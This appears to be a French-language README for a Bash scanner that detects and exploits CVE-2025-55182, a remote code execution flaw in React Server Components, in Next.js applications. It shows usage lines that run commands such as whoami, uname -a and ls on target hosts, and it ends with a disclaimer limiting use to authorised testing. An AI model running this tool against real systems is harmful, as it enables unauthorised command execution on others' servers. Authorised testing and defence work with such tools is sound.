
Scanner basé sur Bash pour la détection et l'exploitation de CVE-2025-55182 (RCE des composants serveur React) dans les applications Next.js. Prend en charge l'exécution de commandes personnalisées et le scan d'URL.
Outil en ligne de commande simple pour détecter et exploiter CVE-2025-55182 (RCE dans les composants serveur React) dans les applications Next.js.

chmod +x scanner.sh
# Analyse avec la commande par défaut (id)
./scanner.sh -d example.com
# Exécuter une commande personnalisée
./scanner.sh -d example.com -c "whoami"
# Avec une URL complète
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Domaine/URL cible (obligatoire)-c, --command - Commande à exécuter (par défaut : id)# Vérifier si la cible est vulnérable
./scanner.sh -d vulnerable-app.com
# Obtenir des informations système
./scanner.sh -d vulnerable-app.com -c "uname -a"
# Lister les fichiers
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.